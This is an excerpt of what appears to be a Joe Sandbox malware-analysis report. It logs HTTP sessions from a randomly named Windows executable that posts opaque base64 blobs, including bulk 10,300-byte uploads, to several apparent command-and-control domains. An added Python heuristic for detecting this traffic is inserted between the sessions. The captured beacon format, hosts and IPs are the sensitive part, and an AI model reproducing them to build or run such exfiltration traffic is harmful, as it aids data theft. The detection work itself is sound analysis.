                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 220
                                                                                                                    Referer: http://www.mjcregionsud.org/r61b/
                                                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
                                                                                                                    Data Raw: 51 7a 6a 3d 36 6f 47 68 69 4e 54 57 57 58 63 50 78 42 77 62 53 67 5a 4c 61 36 71 52 6d 4d 52 6e 36 52 74 58 4d 45 4d 56 64 59 71 36 70 59 78 74 59 68 77 37 70 46 58 4d 62 6f 59 35 38 2b 32 42 4d 78 6f 59 30 7a 54 59 55 46 32 35 78 4c 4a 79 31 33 67 33 51 5a 4c 44 56 59 52 4c 41 4c 38 48 79 41 63 76 65 33 4f 4b 41 76 38 31 34 4e 41 66 56 59 2b 70 46 66 66 67 36 30 71 65 45 36 4f 45 46 49 39 70 6f 36 6a 56 64 50 2f 50 6e 6a 38 74 73 54 4a 4f 32 4e 30 61 71 73 4c 78 62 2b 78 73 2b 5a 39 30 2b 4c 42 7a 48 54 4a 50 58 39 33 6e 50 6d 6c 55 46 37 77 39 59 71 4c 7a 4d 4c 48 6e 36 39 39 6f 52 33 55 34 4e 35 4f 6d 5a 44 61 4d 50 4b 49 38 72 69 34 4a 73 66 51 3d
                                                                                                                    Data Ascii: Qzj=6oGhiNTWWXcPxBwbSgZLa6qRmMRn6RtXMEMVdYq6pYxtYhw7pFXMboY58+2BMxoY0zTYUF25xLJy13g3QZLDVYRLAL8HyAcve3OKAv814NAfVY+pFffg60qeE6OEFI9po6jVdP/Pnj8tsTJO2N0aqsLxb+xs+Z90+LBzHTJPX93nPmlUF7w9YqLzMLHn699oR3U4N5OmZDaMPKI8ri4JsfQ=
Oct 24, 2024 05:08:20.211451054 CEST | 359 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Thu, 24 Oct 2024 03:08:20 GMT
                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                    Content-Length: 196
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


Session ID: 19 | Source: 192.168.2.4:50021 | Destination: 91.212.26.5:80 | PID: 5568 | Process: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 05:08:21.942280054 CEST | 10909 | OUT | POST /r61b/ HTTP/1.1
                                                                                                                    Host: www.mjcregionsud.org
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Origin: http://www.mjcregionsud.org
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 10300
                                                                                                                    Referer: http://www.mjcregionsud.org/r61b/
                                                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
                                                                                                                    Data Raw: 51 7a 6a 3d 36 6f 47 68 69 4e 54 57 57 58 63 50 78 42 77 62 53 67 5a 4c 61 36 71 52 6d 4d 52 6e 36 52 74 58 4d 45 4d 56 64 59 71 36 70 59 35 74 5a 53 6f 37 70 69 37 4d 4a 59 59 35 2f 2b 32 41 4d 78 70 45 30 7a 37 63 55 46 79 44 78 4e 56 79 32 55 6f 33 42 4e 2f 44 43 6f 52 4c 50 72 39 41 76 77 63 32 65 7a 53 47 41 76 73 31 34 4e 41 66 56 65 79 70 43 4e 33 67 38 30 71 5a 4d 61 4f 41 4f 6f 38 45 6f 36 36 71 64 50 4c 35 6d 51 6b 74 73 7a 5a 4f 6c 4f 4d 61 32 38 4c 76 50 65 78 30 2b 5a 77 73 2b 50 68 52 48 51 55 55 58 36 66 6e 66 53 63 41 47 66 45 59 4b 72 2f 33 64 35 48 4c 6a 2b 5a 52 4f 6c 73 47 4a 5a 36 41 5a 43 7a 69 46 70 70 65 77 67 63 32 36 62 64 6b 65 33 2b 42 71 2f 54 2f 58 59 62 56 4f 62 56 59 52 70 34 42 4c 51 4c 49 4f 31 36 43 54 65 79 65 57 76 4f 58 6e 4f 73 56 62 31 73 52 77 47 36 67 6d 30 66 79 49 63 45 6c 55 58 47 64 4e 4d 39 73 45 6a 74 2f 34 53 78 58 62 58 43 74 4b 59 71 4a 51 55 54 76 5a 79 59 50 50 6b 52 63 44 68 67 77 31 34 7a 55 4b 2b 52 36 70 5a 44 67 31 6f 72 57 43 79 6a 68 68 69 [TRUNCATED]
Data Ascii: Qzj=6oGhiNTWWXcPxBwbSgZLa6qRmMRn6RtXMEMVdYq6pY5tZSo7pi7MJYY5/+2AMxpE0z7cUFyDxNVy2Uo3BN/DCoRLPr9Avwc2ezSGAvs14NAfVeypCN3g80qZMaOAOo8Eo66qdPL5mQktszZOlOMa28LvPex0+Zws+PhRHQUUX6fnfScAGfEYKr/3d5HLj+ZROlsGJZ6AZCziFppewgc26bdke3+Bq/T/XYbVObVYRp4BLQLIO16CTeyeWvOXnOsVb1sRwG6gm0fyIcElUXGdNM9sEjt/4SxXbXCtKYqJQUTvZyYPPkRcDhgw14zUK+R6pZDg1orWCyjhhi [TRUNCATED]
Oct 24, 2024 05:08:22.769256115 CEST | 359 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Thu, 24 Oct 2024 03:08:22 GMT
                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                    Content-Length: 196
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
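Every request in the sessions above, whether bound for www.60881.xyz or www.mjcregionsud.org, follows one template: a POST (or GET) to a single short directory, Origin and Referer headers pointing back at the Host although the capture shows no page on that host being fetched first, a fixed iPhone Safari User-Agent sent from a Windows process, and one form field (Qzj, plus Znyl on the GETs) carrying an opaque base64-like blob; the two 10300-byte POSTs are the bulk uploads. The replies are just as telling: www.60881.xyz answers 200 with a parking page whose script bounces the visitor to https://http.gn301.com:12345/, and www.mjcregionsud.org answers nginx 404s, so neither host responded the way a live command-and-control server would (whether they are decoys or simply down cannot be told from this capture). The Python below is an added example, not part of the Joe Sandbox report or of the sample's code: it parses raw requests as printed here, scores them against those traits, and pulls the redirect target out of the parking page for pivoting. Indicator names, the threshold of three, the two benign control requests and the reduced header set kept in the copied requests are this example's own choices; the redirect regex is tailored to the response body shown above.

```python
"""Heuristic triage of the HTTP sessions in this report (added example, not
code from the Joe Sandbox report or from the sample). Indicator names and the
threshold are this example's own choices."""
import re
from typing import Optional
from urllib.parse import urlsplit

BASE64ISH = re.compile(r"^[A-Za-z0-9+/]{6,}={0,2}$")     # opaque blob, no URL-encoding
SHORT_PATH = re.compile(r"^/[a-z0-9]{3,6}/$")            # "/ynjl/", "/r61b/"
SHORT_NAME = re.compile(r"^[A-Za-z0-9]{2,6}$")           # "Qzj", "Znyl"
REDIRECT_JS = re.compile(r'var\s+strU\s*=\s*"([^"]+)"')  # tailored to the 200 body above


def parse_request(raw: str) -> dict:
    """Split a raw HTTP/1.x request into method, target, lower-cased headers and body."""
    head, _, body = raw.replace("\r\n", "\n").strip("\n").partition("\n\n")
    request_line, *header_lines = head.split("\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "headers": headers, "body": body.strip()}


def split_form(encoded: str) -> list:
    """Split a query string or form body WITHOUT URL-decoding, so the '+' and '/'
    inside base64 values are kept as-is for matching."""
    pairs = []
    for field in filter(None, encoded.split("&")):
        name, _, value = field.partition("=")
        pairs.append((name, value))
    return pairs


def request_indicators(raw: str) -> list:
    """Names of the traits the request matches; an empty list means none."""
    req = parse_request(raw)
    h = req["headers"]
    host = h.get("host", "")
    url = urlsplit(req["target"])
    hits = []
    if SHORT_PATH.match(url.path):
        hits.append("short_random_path")
    # Origin/Referer claim a page on the same host was loaded first, yet the
    # capture shows no such GET before the POSTs.
    if h.get("origin") == f"http://{host}" and h.get("referer", "").startswith(f"http://{host}/"):
        hits.append("self_referential_origin_referer")
    if "iPhone" in h.get("user-agent", ""):   # iOS Safari UA from a Windows executable
        hits.append("mobile_ua_from_windows_process")
    # Every field has a short random name and an opaque base64-like value.
    fields = split_form(req["body"] if req["method"] == "POST" else url.query)
    if fields and all(SHORT_NAME.match(n) and BASE64ISH.match(v) for n, v in fields):
        hits.append("opaque_base64_form_fields")
    return hits


def is_formbook_like(raw: str, threshold: int = 3) -> bool:
    """Coarse verdict: several independent traits present at once."""
    return len(request_indicators(raw)) >= threshold


def parked_redirect_target(response_body: str) -> Optional[str]:
    """The 200 OK answers above are a parking page whose script forwards the
    visitor elsewhere; return that destination, or None if there is none."""
    m = REDIRECT_JS.search(response_body)
    return m.group(1) if m else None


# Copied from sessions 15 and 17 above; headers reduced to those the checks read,
# Content-Length dropped, values otherwise as captured.
POST_60881 = """POST /ynjl/ HTTP/1.1
Host: www.60881.xyz
Origin: http://www.60881.xyz
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.60881.xyz/ynjl/
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4

Qzj=CGEbtCZqU0SLM7+/T9OlvIs2a4P8xf4rkK8TgxBhJr/0SQEW5Hriyzsmh4YBGVYa9cLEJZ894bYw0mrXj6eNAU57H0Gt27bCYe8JZ7rhmQLmpUX/mX7pK/d4kmHyukUivSmafW2L86uYWRUkMqWMwAvFWdsCxKdx8l7z5ffet/J5JZ+rda7oBwMgp9SOdTzrlekucewBhYgMWZbS5SMMOlw=
"""
GET_60881 = """GET /ynjl/?Qzj=PEs7u0VzI3DSA9TKYNWnz6gyWb/C39oE0a50vjpoFb3NQEkD5EPR31gJ3YEDEVY88OmbAto+098c/gTiopGLABAEMyjtpbfsUvV6UeXcuCjdlGHHhk6aRcY=&Znyl=2rnxDB HTTP/1.1
Host: www.60881.xyz
Connection: close
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
"""
# Constructed benign controls (not from the report).
BENIGN_GET = """GET /index.html HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/131.0
"""
BENIGN_POST = """POST /login HTTP/1.1
Host: www.example.com
Origin: http://www.example.com
Referer: http://www.example.com/login
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/131.0

username=alice&password=hunter2
"""
# Response bodies from sessions 15 and 17 above (the 200 body abridged after the redirect).
PARKED_200_BODY = '<html><head></head><body><a href="" id="hao123"></a><script type="text/javascript">var strU="https://http.gn301.com:12345/?u="+window.location+"&p="+window.location.pathname+window.location.search;hao123.href=strU;</script></body></html>'
NGINX_404_BODY = '<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>'
```

request_indicators(POST_60881) reports all four traits, the GET three (it carries no Origin or Referer), and the constructed login POST only the Origin/Referer one, which is why a single trait must not trip the verdict: ordinary form submissions share it. The short-path and base64 checks will also match some legitimate tracking beacons, so tune the threshold against your own traffic before using this for alerting.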


Session ID: 20 | Source: 192.168.2.4:50022 | Destination: 91.212.26.5:80 | PID: 5568 | Process: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 05:08:24.478240967 CEST | 535 | OUT | GET /r61b/?Qzj=3quBh4mzL0lL+B9uaAFlB72ZycJbxnt6GENoLoKygJVSWFdT0X7NdoQT/6uiE3Ni1BD7Zx2rh99upTwYdPvuDtoYAZVOuycnaW3rI/gIwuhnX/+XN/+iqEA=&Znyl=2rnxDB HTTP/1.1
                                                                                                                    Host: www.mjcregionsud.org
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
                                                                                                                    Oct 24, 2024 05:08:25.318906069 CEST359INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Thu, 24 Oct 2024 03:08:25 GMT
                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                    Content-Length: 196
                                                                                                                    Connection: close
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.4 | 50023 | 3.33.130.190 | 80 | 5568 | C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 05:08:30.491925001 CEST | 825 | OUT | POST /kbee/ HTTP/1.1
Host: www.levelsabovetravel.info
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Origin: http://www.levelsabovetravel.info
Connection: close
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 200
Referer: http://www.levelsabovetravel.info/kbee/
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
Data Ascii: Qzj=OAIzLskD/9y+zZ2koZAxRj1EMMz5lRq0rcx187NYy3xTred4ftD3Ji5nhOL/Zbk4hGvLyj3ijFED3KR0h+z1BudmU2GRKhYPxwxAII4JVKD+k8Tm/ioduVH3t23BOjkcc1qNqx91zqsl1NvhzzBPFvgD69VY09axjfqJ42a4OvUnHyshL9W+d/rthsBtU4blCQ==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.4 | 50024 | 3.33.130.190 | 80 | 5568 | C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 05:08:33.034070969 CEST | 845 | OUT | POST /kbee/ HTTP/1.1
Host: www.levelsabovetravel.info
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Origin: http://www.levelsabovetravel.info
Connection: close
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 220
Referer: http://www.levelsabovetravel.info/kbee/
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
Data Ascii: Qzj=OAIzLskD/9y+w9ykq7oxWD1HJMz5qxq4rcN186IdzFVTo8V4esD3FC5n1eLwU7k3hHS2yhjijEgD3Lh0hsbyB+dkYWGTFBYPxwxAII8nVLr+kPLmtQQewlH0s23BZzkYc1rgqwQQzoUl1MfhzhpMPvg/0dUO49/doKPJ7k28GuAkPU97aM3pP/Pe8rIZZ7msZehorIVNcd1B4AlQUt+lds0=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.4 | 50025 | 3.33.130.190 | 80 | 5568 | C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 05:08:35.579598904 CEST | 10927 | OUT | POST /kbee/ HTTP/1.1
Host: www.levelsabovetravel.info
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Origin: http://www.levelsabovetravel.info
Connection: close
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 10300
Referer: http://www.levelsabovetravel.info/kbee/
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
Data Ascii: Qzj= [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.4 | 50026 | 3.33.130.190 | 80 | 5568 | C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 05:08:38.123347044 CEST | 541 | OUT | GET /kbee/?Qzj=DCgTIaYcg8rLkvez6aURNH1rI8GLniCnkbIF1Zor3lwvkrlOJ/rxEwh4juCbWbA1v3jo2CjSkAc6+9U16ObyIJEVbwGNWxBZ4iE6d4sVGLDCvtPxuAtI0Gg=&Znyl=2rnxDB HTTP/1.1
Host: www.levelsabovetravel.info
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Connection: close
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
Oct 24, 2024 05:08:38.743752956 CEST | 391 | IN | HTTP/1.1 200 OK
Server: openresty
Date: Thu, 24 Oct 2024 03:08:38 GMT
Content-Type: text/html
Content-Length: 251
Connection: close
Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Qzj=DCgTIaYcg8rLkvez6aURNH1rI8GLniCnkbIF1Zor3lwvkrlOJ/rxEwh4juCbWbA1v3jo2CjSkAc6+9U16ObyIJEVbwGNWxBZ4iE6d4sVGLDCvtPxuAtI0Gg=&Znyl=2rnxDB"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.4 | 50027 | 154.23.184.194 | 80 | 5568 | C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 05:08:44.183862925 CEST | 786 | OUT | POST /9m01/ HTTP/1.1
Host: www.d81dp.top
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Origin: http://www.d81dp.top
Connection: close
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 200
Referer: http://www.d81dp.top/9m01/
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
Data Ascii: Qzj=VRsHMh2u/t3etq5+LZCOXt508ViTD4An6PrHjC3SXSHqQ7ZOlWN059X8n90h5YhlZCTN2wTtDJaqv4r7BywOLZiSn4ceo13KNy1uCDaTxDWL6zfgGlwMt115gse5QhuWSA/YJQOL90D4gmXdkdAMUzekjmlWOmAqTkFwqBg4HyhS6btQiw5da0IPvDDtxvpc5w==
Oct 24, 2024 05:08:45.055300951 CEST | 302 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 24 Oct 2024 03:08:44 GMT
Content-Type: text/html
Content-Length: 138
Connection: close
ETag: "66938482-8a"
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.4 | 50028 | 154.23.184.194 | 80 | 5568 | C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 05:08:46.743406057 CEST | 806 | OUT | POST /9m01/ HTTP/1.1
Host: www.d81dp.top
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Origin: http://www.d81dp.top
Connection: close
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 220
Referer: http://www.d81dp.top/9m01/
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
Data Ascii: Qzj=VRsHMh2u/t3e86p+YoCOSN5321iTR4Aj6P3HjDzCXkvqXapO0nN01dX8od0g04h+ZCfz217tDJOqv4b7BlMJNZiq8occ1l3KNy1uCDfOxHCL9AHgEEwL2V1+jse5DxuKSA+oJSql9374gkfdksALdzemsGk7NV9aJGII1nMMYR5i298KzBYKI0s8yEKZ8sUVi17ihCMsF3gDjNeZXpQ5u5I=
Oct 24, 2024 05:08:47.690577984 CEST | 302 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 24 Oct 2024 03:08:47 GMT
Content-Type: text/html
Content-Length: 138
Connection: close
ETag: "66938482-8a"
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.4 | 50029 | 154.23.184.194 | 80 | 5568 | C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 05:08:49.291754007 CEST | 10888 | OUT | POST /9m01/ HTTP/1.1
Host: www.d81dp.top
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Origin: http://www.d81dp.top
Connection: close
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 10300
Referer: http://www.d81dp.top/9m01/
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
Oct 24, 2024 05:08:50.243462086 CEST | 302 | IN
HTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Thu, 24 Oct 2024 03:08:50 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 138
                                                                                                                    Connection: close
                                                                                                                    ETag: "66938482-8a"
                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID: 28 | Source IP: 192.168.2.4 | Source Port: 50030 | Destination IP: 154.23.184.194 | Destination Port: 80 | PID: 5568 | Process: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
Timestamp | Bytes transferred | Direction
Oct 24, 2024 05:08:51.837604046 CEST | 528 | OUT
GET /9m01/?Qzj=YTEnPXeuvLCqp8pRYoqPCdBwzXmtEoIu3aiFszfHZiHCethv0UoX0rXDgO0m0L5Zay3qgh7+EeCD2cfEa0kxYtbLgo4/0RqeWSM2Ph2v0Riv4xOBN3dU33Q=&Znyl=2rnxDB HTTP/1.1
                                                                                                                    Host: www.d81dp.top
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
Oct 24, 2024 05:08:52.786062002 CEST | 302 | IN
HTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Thu, 24 Oct 2024 03:08:52 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 138
                                                                                                                    Connection: close
                                                                                                                    ETag: "66938482-8a"
                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID: 29 | Source IP: 192.168.2.4 | Source Port: 50031 | Destination IP: 63.250.47.57 | Destination Port: 80 | PID: 5568 | Process: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
Timestamp | Bytes transferred | Direction
Oct 24, 2024 05:08:58.076162100 CEST | 792 | OUT
POST /q7ah/ HTTP/1.1
                                                                                                                    Host: www.numbox.live
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Origin: http://www.numbox.live
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 200
                                                                                                                    Referer: http://www.numbox.live/q7ah/
                                                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
